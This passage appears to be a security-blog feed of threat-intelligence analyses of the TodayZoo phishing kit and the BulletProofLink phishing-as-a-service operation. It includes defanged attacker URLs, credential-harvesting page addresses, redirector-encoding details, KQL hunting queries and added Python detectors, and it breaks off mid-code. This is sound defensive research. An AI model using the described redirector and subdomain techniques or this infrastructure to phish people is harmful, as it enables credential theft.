Breaking down a TodayZoo-based phishing campaign

The use of the TodayZoo phishing kit was initially seen in December 2020. Then, in March 2021, we observed a series of phishing campaigns abusing the AwsApps[.]com domain to send the email messages that eventually directed users to the final landing pages, leading us to examine the kit more closely. As of this writing, we have already notified Amazon about the abuse of their domain described above, and they promptly took action.

The attackers created malicious accounts at scale. Initially, the sender emails appeared with randomly generated domain names such as wederfs76y3uwedi3uy89ewdu23ye87293eqwhduayqw[.]awsapps[.]com. This contrasts with legitimate emails—and even some spoofed phishing ones—where the subdomain would represent a company hostname.

The email message itself was relatively simple: it impersonated Microsoft and leveraged a zero-point font obfuscation technique in an attempt to evade detection. For example, in the early iterations of their campaign, the attackers used the <ins></ins> tags to insert the date of the message every few characters invisibly, as shown below:

Screenshot of HTML code showing zero-point font technique

Figure 1. Example of zero-point font obfuscation to insert the date into the HTML code of the email message

The social engineering lures in the message body changed repeatedly over the months. Campaigns in April and May used password reset lures, while the more recent campaigns in August leveraged fax and scanner notifications.

Screenshot of email used in this campaign

Figure 2. Example of an email lure leading to TodayZoo phishing kit

Regardless of the lure, the following attack chain is consistent, with initial and secondary redirectors, a final landing page, and a credential harvesting page. Below is a sample of TodayZoo’s attack chain URLs:

  • Initial redirector: hxxp://2124658742[.]ujsd[.]pentsweser[.]com//fhwpp8sv[.]#aHR0cHM6Ly9saW1lc3RvbmVzbS5jb20vZWRmaC5rZXJmcS8jbm8tcmVwbHlAbWljcm9zb2Z0LmNvbQ==
  • Secondary redirector: hxxps://limestonesm[.]com/edfh.kerfq/#no-reply@microsoft[.]com
  • Final landing page: hxxps://fra1[.]digitaloceanspaces[.]com/koip/25_40_24_5E_40_26_40_26_28_29_23_23_5E_23_24_26_5E_25_26_40_5E_28_23_26.html#no-reply@microsoft[.]com
  • Credential harvesting page: hxxps://nftduniya[.]com/cas/vcoominctodayq[.]php

The initial and secondary URLs are either compromised or attacker-created sites and serve as redirectors that funnel the much larger set of URLs used in the emails to the final landing page where the phishing kit is hosted. The initial URL used infinite subdomains, a previously discussed technique that allows attackers to use a unique URL for each recipient while only purchasing or compromising one domain. The initial URL was also deliberately malformed, with multiple forward slashes at the boundary between host and path, and it carried the secondary URL, encoded together with the recipient’s email address, in its fragment.
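The following is an added example, not code from the post or from Microsoft, that parses an initial redirector URL of the shape shown above: it refangs the defanged notation, checks for the numeric per-recipient label, the doubled slash at the host/path boundary and the `.#` marker, and then decodes the fragment to recover the secondary redirector and the recipient address it carries. The regular expression, the function names and the tolerance for URLs without a scheme or without the `ujsd` label (both shapes appear in the indicators later on this page) are assumptions of this example; the TLD is not limited to `.com` so that the same parser works on other base domains.

```python
import base64
import re
from typing import Optional
from urllib.parse import urlsplit

# Shape of the TodayZoo initial redirector described in the post:
#   <numeric label>.ujsd.<base domain>//<random token>.#<Base64 payload>
# The scheme, the numeric label and the "ujsd" marker are optional so the
# sample initial URLs listed in the indicators section also parse.
INITIAL_REDIRECTOR = re.compile(
    r"^(?:https?://)?"
    r"(?:(?P<label>\d+)\.)?"          # per-recipient numeric subdomain label
    r"(?:ujsd\.)?"                    # operator marker present in most samples
    r"(?P<base>[a-z0-9-]+\.[a-z]+)"   # base (registrable) domain
    r"//"                             # doubled slash at the host/path boundary
    r"(?P<token>[a-z0-9]+)\.#"        # random path token followed by ".#"
    r"(?P<payload>[A-Za-z0-9+/=]+)$"  # Base64 of the secondary redirector
)


def refang(indicator: str) -> str:
    """Turn the defanged notation used in this post (hxxp, [.]) back into a URL."""
    return indicator.replace("[.]", ".").replace("hxxp", "http")


def decode_initial_redirector(indicator: str) -> Optional[dict]:
    """Parse a (possibly defanged) TodayZoo initial redirector URL.

    Returns None when the URL does not have the TodayZoo shape, otherwise a
    dict with the base domain, the per-recipient label, the path token, the
    decoded secondary redirector and the recipient address in its fragment.
    """
    m = INITIAL_REDIRECTOR.match(refang(indicator).strip())
    if not m:
        return None
    try:
        secondary = base64.b64decode(m["payload"], validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None  # TodayZoo-shaped URL, but the payload is not clean Base64
    # The secondary redirector carries the targeted address after '#'.
    recipient = urlsplit(secondary).fragment or None
    return {
        "base_domain": m["base"],
        "subdomain_label": m["label"],
        "path_token": m["token"],
        "secondary_url": secondary,
        "recipient": recipient,
    }


if __name__ == "__main__":
    # Sample taken from the attack chain above, defanged exactly as on the page.
    sample = ("hxxp://2124658742[.]ujsd[.]pentsweser[.]com//fhwpp8sv[.]#"
              "aHR0cHM6Ly9saW1lc3RvbmVzbS5jb20vZWRmaC5rZXJmcS8jbm8tcmVwbHlAbWljcm9zb2Z0LmNvbQ==")
    for key, value in decode_initial_redirector(sample).items():
        print(f"{key:16} {value}")
```

Running it on the sample above yields the secondary redirector and the `no-reply@microsoft[.]com` address listed in the attack chain; the same decoder applied to the sample initial URLs in the indicators section yields the secondary redirector domains listed there, which is a quick way to confirm that an initial URL seen in mail telemetry belongs to this chain.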

In almost every instance of the TodayZoo-based campaign we’ve seen, the final landing page is hosted within the service provider DigitalOcean. This page bears a few tangible differences from a standard Microsoft 365 sign-in page. Notably, it has not substantially changed in appearance from the start of the year to the time of publication of this blog. This lack of change is because, despite the numerous changes in the delivery method, lures, and sites used as indicators of attack (IOAs), the TodayZoo kit stayed nearly identical with only a few strings changing.

Screenshot of phishing page where credentials are stolen

Figure 3. An example of TodayZoo’s fake sign-in page in August 2021

There is little of the obfuscation component within the TodayZoo kit: the landing page’s source code plainly revealed where the stolen credentials would be exfiltrated, which was another compromised site with a path ending in TodayZoo.php. Typically, credential harvesting pages process the credentials and forward them to additional email accounts owned by sellers or purchasers of the kit for collection later. It’s unusual for campaigns to store the credentials locally on the site itself.

Screenshot of code for credential harvesting

Figure 4. An excerpt from the TodayZoo HTML source depicting credential exfiltration

It should be noted that based on our analysis, the file name TodayZoo.php appears to be derived from a previous version of the phishing kit whose credential processing page ends in Zoom.php. The said version also has markers like “Today Zoom Meetings,” indicating that it was initially targeting users of a popular video conferencing application.

The succeeding TodayZoo-based campaigns follow the attack kill chain pattern and source code discussed above. While TodayZoo.php was used for the first few months of operation, the most recent harvesting pages have kept the word “today” but now may use vcoominctodayq.php instead.

The attackers have also moved from abusing a single legitimate mailing service to compromising mailing service accounts for their email campaigns. However, they maintain specific leftover character patterns in their URL paths and subdomains that work with the other TTPs described.

Piecing the puzzle

Typically, phishing kits that are resold or reused have indicators of multiple actors using them through their generated email campaigns. For example, these campaigns will have varying redirection techniques and hosting domains for their final landing pages. In the case of TodayZoo, as previously mentioned, there is consistency in the patterns, domains, and TTPs of the related campaigns. While many phishing kits are attributed to a wide variety of email campaign patterns and, conversely, many email campaign patterns are associated with many phishing kits, TodayZoo-based pages exclusively utilized the same email campaign patterns, and any of those subsequent email campaigns only surfaced TodayZoo kits. These lead us to believe that the actors behind this specific TodayZoo implementation are operating on their own.

Within the source code of the TodayZoo landing page we analyzed, there were several static references at the very start to external sources. Generally, these external links help a phishing kit properly imitate the login page and other branding elements of the site it is spoofing. However, in TodayZoo’s case, many of these site connections were “dead links” and did not serve a relevant function within the page. Littered throughout the source code as well were various markers like <!-- FORM 1111111111111111 --> and <!-- FINISHHHHHHHHHHHHHHHHHHHHH -->. Some portions of the source code also used different languages in different sections, making it clear which sections had been replaced.

Upon further investigation, we identified the dead links and markers as holdovers from many other commoditized kits available for free or purchase. We then compared TodayZoo with other phishing kits we have analyzed previously and found that even these kits also contained references to sites like Dancevida[.]com but would have different code blocks for their obfuscation or credential harvest components.

Screenshot of TodayZoo code showing references to DanceVida

Figure 5. An excerpt from a TodayZoo landing page source code referencing DanceVida[.]com

The DanceVida connection

“DanceVida” is more of a code block than a full-fledged phishing kit. As such, kits that use DanceVida are rather diverse in their delivery, lures, and location because they are sold directly on various forums under different kit names, as well as under a wider variety of landing page templates, including document download pages. Most of the credentials that the DanceVida-based kits’ harvesting pages gather are exfiltrated to accounts on free email services, such as Gmail, Yahoo!, and Yandex.

One of the more notable kits that also references DanceVida and shares components with what we observed in the TodayZoo credential phishing campaigns is “Office-RD117,” which is related to an online seller known as “Fud Tool.” This seller also offers other phishing kits and email and SMS delivery tools on various forums and other websites.

Screenshot of FUD Tool website

Figure 6. Screenshot of the now-defunct Fud Tool website from the Wayback Machine Internet Archive

It is interesting to note that when analyzing the Office-RD117 kit, we also saw signatures from multiple sellers within its packaged resources. There are also instances of dead links, such as a reference to a GitHub account that was only live for less than a day in January 2020 (the said account is still carried over to kits online as of this writing). This goes to show that even commercially available phishing kits reuse and repurpose elements from other ones. Such mixing and matching also make it quite challenging to determine where one kit ends and another one begins.

Comparing TodayZoo with DanceVida and other kits

In the case of TodayZoo, we observed that its implementations only match the larger superset of kits referencing DanceVida at about 30-35%. As seen in the figures below, which compare a TodayZoo sample with a randomly selected DanceVida sample, both initially have a similar structure and pieces of code until TodayZoo deviates in the credential harvesting component:

Screenshots comparing source code for DanceVida and TodayZoo phishing kits

Figure 7. A comparison of DanceVida and TodayZoo kits, showing matching source code

Screenshots comparing source code for DanceVida and TodayZoo phishing kits

Figure 8. A comparison of DanceVida and TodayZoo kits, showing highly similar source code. Note how TodayZoo has changed its variables.

Screenshots comparing source code for DanceVida and TodayZoo phishing kits

Figure 9. A comparison of DanceVida and TodayZoo kits showing slightly different implementation for credential posting

To further illustrate the “Frankenstein’s monster” characteristic of TodayZoo, the table below expands the comparison of one of its current phishing pages with Office-RD117, as well as with four other landing pages. These landing pages are unattributed to specific operators and reference DanceVida or use the same credential-harvesting POST statements. While all these samples share code segments in their imitation, obfuscation, or credential harvesting components, they each still have unique elements that differentiate them.

Table comparing different phishing kits and their similarity with TodayZoo

Table 1. Similarity areas and percentages of related phish kits to a recent TodayZoo sample

Visual representation of similarity of code between TodayZoo and other phishing kits

Figure 10. Graphical representation of the similarity areas of related phish kits to a recent TodayZoo sample

The above comparisons show a history of alterations and suggest the existence of a “core” set of code being reused by these phishing kits. They are also reminiscent of how remote access Trojans (RATs) and other malware families are continuously retooled by threat actors yet retain large chunks of code across the board.

How threat intelligence enriches anti-phishing technologies in Microsoft Defender for Office 365

Our analysis of TodayZoo, DanceVida, and other phishing kits gives us several insights into the underground economy today. First, this research further proves that most phishing kits observed or available today are based on a smaller cluster of larger kit “families.” While this trend has been observed previously, it continues to be the norm, given how phishing kits we’ve seen share large amounts of code among themselves. The continued presence of dead links and callbacks to other kits indicates that many phishing kit distributors and phishing operators have easy access to these existing kits and use parts of them to make new ones faster.

Secondly, our research shows that the players in the cybercrime economy count on a lack of examination of their products. Whether that is a bane or a boon for them depends on how the products’ code is implemented. For example, an unchecked reused kit that still calls back to its original creator with copies of stolen credentials potentially translates into the equivalent of a passive income for the said creator.

Insights such as those presented above enrich our protection technologies. Our intelligence on unique phishing kits such as TodayZoo, phishing services, and other components of phishing attacks allows Microsoft Defender for Office 365 to detect related campaigns and block malicious emails, URLs, and landing pages. Combined with Defender for Office 365’s use of machine learning, heuristics, and advanced detonation technology, such intel also makes it possible to detect kits that attempt to leverage techniques from one or multiple code bases, even before a user receives the email or interacts with the content.

Threat intelligence about the latest trends in the phishing landscape also feeds into other Microsoft security solutions, such as Microsoft Defender SmartScreen, which blocks phishing websites and malicious URLs and domains in the browser, and Network protection, which blocks connections to malicious domains and IP addresses. Advanced hunting capabilities allow analysts to search for phishing kit components and other IOAs.

Organizations can configure the recommended settings in Microsoft Defender for Office 365, such as applying anti-phishing, Safe Links, and Safe Attachments policies. These ensure real-time protection by scanning at the time of delivery and at the time of click. They can further strengthen their protection with Microsoft 365 Defender, which correlates signals from emails, endpoints, and other domains, delivering coordinated defense.

Learn how you can stop credential phishing and other email threats through comprehensive, industry-leading protection with Microsoft Defender for Office 365.

Visit our National Cybersecurity Awareness Month page for more resources and information on protecting your organization year-round. Do your part. #BeCyberSmart

Microsoft 365 Defender Threat Intelligence Team

Advanced hunting queries

Emails with TodayZoo operator patterns

Use this query to find emails sent that utilize additional forward slashes at the path and domain split point and utilize the TodayZoo operators’ patterns in the path and the subdomain structure. TodayZoo operators occasionally store URLs in the attachment, so this query would not surface those instances.

EmailUrlInfo
| where Url matches regex "(ujsd)?\\.[a-z]+\\.com\\/\\/.+\\.#"

Endpoint activity where TodayZoo patterns redirect to DigitalOcean

Use this query to find endpoint network connections to URLs that utilize additional forward slashes at the path and domain split point and the TodayZoo operators’ patterns in the path and subdomain structure, or to DigitalOcean Spaces, and to surface devices that contacted two or more such domains within the same hour.

DeviceNetworkEvents
| where RemoteUrl matches regex "(ujsd)\\.[a-z]+\\.com\\/\\/.+\\.#" or RemoteUrl endswith "digitaloceanspaces.com"
| extend Domain = extract(@"[^.]+(\.[^.]{2,3})?\.[^.]{2,12}$", 0, RemoteUrl)
| summarize dcount(Domain), make_set(Domain) by DeviceId,bin(Timestamp, 1h), InitiatingProcessFileName, InitiatingProcessCommandLine
| where dcount_Domain >= 2
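The following is an added example, not part of the post or of any Microsoft tooling, that replays the logic of the DeviceNetworkEvents query above in Python so it can be run over exported or non-KQL telemetry: it keeps events whose URL matches the TodayZoo redirector pattern or points at DigitalOcean Spaces, buckets them per device, hour and initiating process, and flags buckets that touched at least two distinct base domains. The event dictionary layout, the `base_domain()` heuristic (last two labels, or three when the second-level label is short, which is what the query's `extract()` regex approximates) and the sample telemetry are constructed for this example; the `RemoteUrl` values are modelled on the attack chain shown earlier on this page.

```python
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import urlsplit

# Both conditions are the ones used in the DeviceNetworkEvents query above.
TODAYZOO_REDIRECTOR = re.compile(r"(ujsd)\.[a-z]+\.com//.+\.#")
LANDING_SUFFIX = "digitaloceanspaces.com"


def hostname(url: str) -> str:
    """Host part of a URL, or the value itself when it is already a bare host."""
    parsed = urlsplit(url if "://" in url else "//" + url)
    return (parsed.hostname or "").lower()


def base_domain(url: str) -> str:
    """Collapse a host to its last two labels, or three when the second-level
    label is short (co.uk style). A heuristic, not a public-suffix lookup."""
    labels = hostname(url).split(".")
    if len(labels) >= 3 and len(labels[-2]) <= 3:
        return ".".join(labels[-3:])
    return ".".join(labels[-2:])


def is_todayzoo_related(url: str) -> bool:
    """Same predicate as the query's `where` clause."""
    return bool(TODAYZOO_REDIRECTOR.search(url)) or hostname(url).endswith(LANDING_SUFFIX)


def hunt_todayzoo_chains(events, min_domains: int = 2):
    """Keep matching events, bucket them per device, hour and initiating
    process, and flag buckets that touched at least `min_domains` distinct
    base domains (a redirector followed by the landing page)."""
    buckets = defaultdict(set)
    for ev in events:
        if not is_todayzoo_related(ev["RemoteUrl"]):
            continue
        hour = ev["Timestamp"].replace(minute=0, second=0, microsecond=0)
        key = (ev["DeviceId"], hour, ev["InitiatingProcessFileName"])
        buckets[key].add(base_domain(ev["RemoteUrl"]))
    return [
        {"DeviceId": dev, "Hour": hour, "Process": proc, "Domains": sorted(doms)}
        for (dev, hour, proc), doms in sorted(buckets.items())
        if len(doms) >= min_domains
    ]


def _ev(ts, device, url, proc="msedge.exe"):
    return {"Timestamp": ts, "DeviceId": device,
            "InitiatingProcessFileName": proc, "RemoteUrl": url}


# Constructed telemetry (not real data), modelled on the attack chain above.
SAMPLE_EVENTS = [
    # wks-01 follows the whole chain within one hour: redirector, then landing page
    _ev(datetime(2021, 8, 12, 9, 14), "wks-01",
        "http://2124658742.ujsd.pentsweser.com//fhwpp8sv.#aHR0cHM6Ly9saW1lc3RvbmVzbS5jb20v"),
    _ev(datetime(2021, 8, 12, 9, 14), "wks-01", "https://limestonesm.com/edfh.kerfq/"),
    _ev(datetime(2021, 8, 12, 9, 15), "wks-01", "https://fra1.digitaloceanspaces.com/koip/page.html"),
    # wks-02 only fetched a static asset from DigitalOcean Spaces: one domain, not flagged
    _ev(datetime(2021, 8, 12, 9, 30), "wks-02", "https://nyc3.digitaloceanspaces.com/assets/app.js"),
    # wks-03 hit a redirector and, three hours later, a landing page: separate hourly buckets
    _ev(datetime(2021, 8, 12, 10, 5), "wks-03", "http://946552600.ujsd.buiyosi.com//x9ab2kq.#aHR0cHM6"),
    _ev(datetime(2021, 8, 12, 13, 5), "wks-03", "https://fra1.digitaloceanspaces.com/koip/page.html"),
]


if __name__ == "__main__":
    for hit in hunt_todayzoo_chains(SAMPLE_EVENTS):
        print(hit)
```

Only wks-01 is flagged: the secondary redirector (limestonesm.com) is not matched by either condition, exactly as in the query, so the two-domain threshold is met by the initial redirector plus the landing page within the same hour. A benign DigitalOcean Spaces fetch on its own, or a chain spread across hour boundaries, stays below the threshold, which is the trade-off the hourly bin in the original query makes.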

Indicators of compromise

Sample initial base domains

pentsweser[.]com
eurhutos[.]com
dalotcii[.]com
buiyosi[.]com
gsuouyty[.]com
matanictii[.]com
phmakert[.]com
brepeme[.]com
conncorrd[.]com
sazmath[.]com
normmavec[.]com
jumperctin[.]com
selfessdas[.]com
kurvuty[.]com
iotryfuty[.]com
setmakersl[.]com
vlogctii[.]com
coffimkeer[.]com
mosyeurty[.]com
qurythuy[.]com
carlssbad[.]com
chovamb[.]com
tenssmor[.]com
tenssmr[.]com
coffkeer[.]com
tamsops[.]com
speedoms[.]com
shageneppi[.]com
shadain[.]com
coffieer[.]com
cofeer[.]com
carrtwright[.]com
uyfteuty[.]com
slobhurtiy[.]com
braingones[.]com
beinsmter[.]com
ksfcaghyou[.]com
coffkr[.]com
rtuatatcty[.]com
lamyot[.]com
tenssm[.]com
kanesatakss[.]com
brainsdeads[.]com
ourygshry[.]com

Sample initial domains with subdomains

1776769042[.]ujsd[.]iotryfuty[.]com
443577567[.]ujsd[.]iotryfuty[.]com
646611056[.]ujsd[.]gsuouyty[.]com
1007183231[.]ujsd[.]gsuouyty[.]com
1469782555[.]ujsd[.]phmakert[.]com
1436029448[.]ujsd[.]buiyosi[.]com
946552600[.]ujsd[.]buiyosi[.]com
1733787821[.]ujsd[.]buiyosi[.]com
1988722677[.]ujsd[.]eurhutos[.]com
255622856[.]ujsd[.]eurhutos[.]com
600774497[.]ujsd[.]sazmath[.]com
1315116569[.]ujsd[.]setmakersl[.]com
1179340144[.]ujsd[.]sazmath[.]com
516942697[.]ujsd[.]setmakersl[.]com
1742965301[.]ujsd[.]setmakersl[.]com
124967719[.]ujsd[.]normmavec[.]com
202271174[.]ujsd[.]pentsweser[.]com
1010306526[.]ujsd[.]iotryfuty[.]com
728156920[.]ujsd[.]iotryfuty[.]com
1244535616[.]ujsd[.]selfessdas[.]com
1227334331[.]ujsd[.]selfessdas[.]com
1229648857[.]ujsd[.]kurvuty[.]com
926765708[.]ujsd[.]kurvuty[.]com
254503147[.]ujsd[.]kurvuty[.]com
1656812361[.]ujsd[.]dalotcii[.]com
100666740[.]ujsd[.]matanictii[.]com
404793834[.]ujsd[.]matanictii[.]com
879643450[.]ujsd[.]matanictii[.]com
658338120[.]ujsd[.]matanictii[.]com
1359496128[.]ujsd[.]dalotcii[.]com
995216045[.]ujsd[.]dalotcii[.]com
1838392685[.]ujsd[.]dalotcii[.]com
9725332[.]ujsd[.]brepeme[.]com
1668463162[.]ujsd[.]conncorrd[.]com
165175575[.]ujsd[.]sazmath[.]com
215852665[.]ujsd[.]brepeme[.]com

Sample initial URLs

  • odghyuter[.]com//wfvmlpxuhjeq[.]#aHR0cHM6Ly9wb2dmaHJ5ZXQuY29tL2VkZmgua2VyZnEvI25vLXJlcGx5QG1pY3Jvc29mdC5jb20=
  • ujsd.coffimkeer[.]com//0jw7yklk[.]#aHR0cHM6Ly9sdWh5cnR5ZS5jb20vZWRmaC5rZXJmcS8jbm8tcmVwbHlAbWljcm9zb2Z0LmNvbQ==
  • ujsd.pentsweser[.]com//iojjyaqw[.]#aHR0cHM6Ly9saW1lc3RvbmVzbS5jb20vZWRmaC5rZXJmcS8jbm8tcmVwbHlAbWljcm9zb2Z0LmNvbQ==
  • ujsd.brepeme[.]com//bnxvhyex[.]#aHR0cHM6Ly92YWVwbGVyLmNvbS9lZGZoLmtlcmZxLyNuby1yZXBseUBtaWNyb3NvZnQuY29t

Sample secondary (redirector) URLs

  • pogfhryet[.]com/edfh[.]kerfq/#no-reply@microsoft[.]com
  • luhyrtye[.]com/edfh[.]kerfq/#no-reply@microsoft[.]com

Sample final landing page

  • nyc3[.]digitaloceanspaces[.]com/bnj/25_40_24_5E_40_26_40_26_28_29_23_23_5E_23_24_26_5E_25_26_40_5E_28_23_26_%25_%25_%25_%25_%25_%25_%25_%25_%25_%25_%25_%25_%25_%25_%25_%25_%25_%25_%25_%25_%25_%25_%25_%25_%25_%25_%25_%25_%25_%25_%25_%25_%25_%25_%25_%25[.]html#no-reply@microsoft[.]com

Sample credential harvesting page

  • lcspecops[.]com/psl/vcoominctodayq[.]php


The post Franken-phish: TodayZoo built from other phishing kits appeared first on Microsoft Security Blog.

Catching the big fish: Analyzing a large-scale phishing-as-a-service operation

September 21st, 2021

In researching phishing attacks, we came across a campaign that used a rather high volume of newly created and unique subdomains—over 300,000 in a single run. This investigation led us down a rabbit hole as we unearthed one of the operations that enabled the campaign: a large-scale phishing-as-a-service operation called BulletProofLink, which sells phishing kits, email templates, hosting, and automated services at a relatively low cost.

With over 100 available phishing templates that mimic known brands and services, the BulletProofLink operation is responsible for many of the phishing campaigns that impact enterprises today. BulletProofLink (also referred to as BulletProftLink or Anthrax by its operators in various websites, ads, and other promotional materials) is used by multiple attacker groups in either one-off or monthly subscription-based business models, creating a steady revenue stream for its operators.

This comprehensive research into BulletProofLink sheds a light on phishing-as-a-service operations. In this blog, we expose how effortless it can be for attackers to purchase phishing campaigns and deploy them at scale. We also demonstrate how phishing-as-a-service operations drive the proliferation of phishing techniques like “double theft”, a method in which stolen credentials are sent to both the phishing-as-a-service operator as well as their customers, resulting in monetization on several fronts.

Insights into phishing-as-a-service operations, their infrastructure, and their evolution inform protections against phishing campaigns. The knowledge we gained during this investigation ensures that Microsoft Defender for Office 365 protects customers from the campaigns that the BulletProofLink operation enables. As part of our commitment to improve protection for all, we are sharing these findings so the broader community can build on them and use them to enhance email filtering rules as well as threat detection technologies like sandboxes to better catch these threats.

Understanding phishing kits and phishing-as-a-service (PhaaS)

The persistent onslaught of email-based threats continues to pose a challenge for network defenders because of improvements in how phishing attacks are crafted and distributed. Modern phishing attacks are typically facilitated by a large economy of email and false sign-in templates, code, and other assets. While it was once necessary for attackers to individually build phishing emails and brand-impersonating websites, the phishing landscape has evolved its own service-based economy. Attackers who aim to facilitate phishing attacks may purchase resources and infrastructure from other attacker groups including:

  • Phish kits: Refers to kits that are sold on a one-time sale basis from phishing kit sellers and resellers. These are packaged files, usually a ZIP file, that come with ready-to-use email phishing templates designed to evade detection and are often accompanied by a portal with which to access them. Phish kits allow customers to set up the websites and purchase the domain names. Alternatives to phishing site templates or kits also include templates for the emails themselves, which customers can customize and configure for delivery. One example of a known phish kit is the MIRCBOOT phish kit.
  • Phishing-as-a-service: Similar to ransomware-as-a-service (RaaS), phishing-as-a-service follows the software-as-a-service model, which requires attackers to pay an operator to wholly develop and deploy large portions or complete phishing campaigns from false sign-in page development, website hosting, and credential parsing and redistribution. BulletProofLink is an example of a phishing-as-a-service (PhaaS) operation.

Table showing differences between phishing kits and phishing-as-a-service

Figure 1. Feature comparison between phishing kits and phishing-as-a-service

It’s worth noting that some PhaaS groups may offer the whole deal—from template creation, hosting, and overall orchestration, making it an enticing business model for their clientele. Many phishing service providers offer a hosted scam page solution they call “FUD” Links or “Fully undetected” links, a marketing term used by these operators to try and provide assurance that the links are viable until users click them. These phishing service providers host the links and pages and attackers who pay for these services simply receive the stolen credentials later on. Unlike in certain ransomware operations, attackers do not gain access to devices directly and instead simply receive untested stolen credentials.

Breaking down BulletProofLink services

To understand how PhaaS works in detail, we dug deep into the templates, services, and pricing structure offered by the BulletProofLink operators. According to the group’s About Us web page, the BulletProofLink PhaaS group has been active since 2018 and proudly boasts of their unique services for every “dedicated spammer”.

Screenshot of About Us page on the BulletProofLink website

Figure 2. The BulletProofLink’s ‘About Us’ page provides potential customers an overview of their services.

The operators maintain multiple sites under their aliases, BulletProftLink, BulletProofLink, and Anthrax, including YouTube and Vimeo pages with instructional advertisements as well as promotional materials on forums and other sites. In many of these cases, and in ICQ chat logs posted by the operator, customers refer to the group by these aliases interchangeably.

Screenshot of video tutorials posted by BulletProofLink

Figure 3. Video tutorials posted by the Anthrax Linkers (aka BulletProofLink)

BulletProofLink registration and sign-in pages

BulletProofLink additionally hosts multiple sites, including an online store where they allow their customers to register, sign in, and advertise their hosted service for monthly subscriptions.

Over the course of monitoring this operation, their online store had undergone multiple revisions. The source code for the site’s pages contained references to artifacts elsewhere on the site, which included ICQ chat messages and advertisements. While those references are still present in newer versions, the sign-in page for the monthly subscription site no longer contains service pricing information. In previous versions, the sites alluded to the cost for the operator to host FUD links and return credentials to the purchasing party.

Screenshot of BulletProofLink registration page

Figure 4. BulletProofLink registration page

Just like any other service, the group even boasts of a 10% welcome discount on customers’ orders when they subscribe to their newsletter.

Screenshot of 10% discount offered to those who will sign up for newsletter

Figure 5. BulletProofLink welcome promotion for site visitors’ first order

Credential phishing templates

BulletProofLink operators offer over 100 templates and operate with a highly flexible business model. This business model allows customers to buy the pages and “ship” the emails themselves, controlling the entire flow of password collection by registering their own landing pages, or to make full use of the service by using BulletProofLink’s hosted links as the final site where potential victims key in their credentials.

The templates are designed to evade detection while successfully phishing for credentials, but may vary based on the individual purchasing party. Likewise, the wide variety of templates offered does not guarantee that all BulletProofLink facilitated campaigns will look identical. Instead, the campaigns themselves can be identified with a mixture of phishing page source code, combined with the PHP password processing sites referenced therein, as well as the hosting infrastructure used in their larger-scale campaigns. These password-processing domains correlate back to the operator through hosting, registration, email, and other metadata similarities during domain registration.

The templates offered are related to the phishing pages themselves, so the emails that service them may seem highly disparate and handled by multiple operators.

Services offered: Customer hosting and support

The phishing operators list an array of services on their site along with the corresponding fees. As OSINT Fans noted in their blog, the monthly service costs as much as $800, while other services cost about $50 for a one-time hosting link. We also found that Bitcoin is a common payment method accepted on the BulletProofLink site.

In addition to communicating with customers on site accounts, the operators display various methods of interacting with them, which include Skype, ICQ, forums, and chat rooms. Like a true software business dedicated to their customers, the operators provide customer support services for new and existing customers.

Screenshot of phishing templates being sold by BulletProofLink

Figure 6. Screenshot of the BulletProofLink site, which offers a wide array of phishing services impersonating various legitimate services

Screenshot of BulletProofLink website showing DocuSign services

Figure 7. DocuSign scam page service listed on the BulletProofLink site

The hosting service includes a weekly log shipment to purchasing parties, usually sent manually over ICQ or email. Analysis of individual activity on password-processing replies from the collected infrastructure indicates that the credentials are received on the initial template page and then sent to password-processing sites owned by the operator.

Screenshot of a BulletProofLink ad

Figure 8. An advertisement from BulletProofLink that showcases their weekly log shipment

At the time of this report, BulletProofLink continues to operate active phishing campaigns, with large volumes of redirections to their password-processing links from legitimate web hosting providers. In the next section, we describe one such campaign.

Tracking a BulletProofLink-enabled campaign

As mentioned, we uncovered BulletProofLink while investigating a phishing campaign that used the BulletProofLink phishing kit on either attacker-controlled sites or sites provided by BulletProofLink as part of their service. The campaign itself was notable for its use of 300,000 subdomains, but our analysis exposed one of many implementations of the BulletProofLink phishing kit:

Diagram showing BulletProofLink-enabled attack chain

Figure 9. End-to-end attack chain of BulletProofLink-enabled phishing campaigns

An interesting aspect of the campaign that drew our attention was its use of a technique we call “infinite subdomain abuse”, which happens when attackers compromise a website’s DNS or when a compromised site is configured with DNS that allows wildcard subdomains. “Infinite subdomains” allow attackers to use a unique URL for each recipient while only having to purchase or compromise one domain for weeks on end. It is gaining popularity among attackers for the following reasons:

  • It serves as a departure from previous techniques that involved hackers obtaining large sets of single-use domains. To leverage infinite subdomains for use in email links that serve to redirect to a smaller set of final landing pages, the attackers then only need to compromise the DNS of the site, and not the site itself.
  • It allows phishing operators to maximize the unique domains they are able to use by configuring dynamically generated subdomains as a prefix to the base domain for each individual email.
  • The creation of unique URLs poses a challenge to mitigation and detection methods that rely solely on exact matching for domains and URLs.
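The following is an added example, not code from the post or from Microsoft, that shows the detection side of the third bullet: instead of exact-matching hostnames, it groups the hostnames seen in mail or proxy telemetry by their parent domain, counts the distinct leftmost labels, and flags parents whose labels are almost all machine-generated (all digits, as in the TodayZoo indicators earlier on this page, or long mixed runs of letters and digits such as the awsapps sender subdomain quoted there). The thresholds, the `looks_generated()` heuristic and the sample hostnames are constructed for this example; four of the sample hosts are taken from the TodayZoo indicators list above and the rest are constructed.

```python
from collections import defaultdict


def looks_generated(label: str) -> bool:
    """Heuristic for per-recipient labels: all digits (as in the TodayZoo
    indicators) or a long run that mixes letters and digits."""
    return label.isdigit() or (
        len(label) >= 12
        and any(c.isdigit() for c in label)
        and any(c.isalpha() for c in label)
    )


def infinite_subdomain_candidates(hosts, min_unique: int = 5,
                                  min_generated_ratio: float = 0.8):
    """Group hostnames by parent domain and report parents that carry many
    distinct, mostly generated leftmost labels: the footprint a wildcard
    DNS entry leaves when each recipient gets a unique subdomain."""
    labels_by_parent = defaultdict(set)
    for host in hosts:
        host = host.lower().replace("[.]", ".").strip(".")
        label, _, parent = host.partition(".")
        if label and parent:
            labels_by_parent[parent].add(label)

    findings = []
    for parent, labels in sorted(labels_by_parent.items()):
        if len(labels) < min_unique:
            continue
        generated = sum(looks_generated(label) for label in labels)
        ratio = generated / len(labels)
        if ratio >= min_generated_ratio:
            findings.append({
                "parent": parent,
                "unique_labels": len(labels),
                "generated_ratio": round(ratio, 2),
            })
    return findings


# Sample input: the first four hosts come from the TodayZoo indicators list on
# this page, the remaining hosts are constructed for the example.
SAMPLE_HOSTS = [
    "1776769042[.]ujsd[.]iotryfuty[.]com",
    "443577567[.]ujsd[.]iotryfuty[.]com",
    "1010306526[.]ujsd[.]iotryfuty[.]com",
    "728156920[.]ujsd[.]iotryfuty[.]com",
    "1388207744[.]ujsd[.]iotryfuty[.]com",   # constructed, same shape
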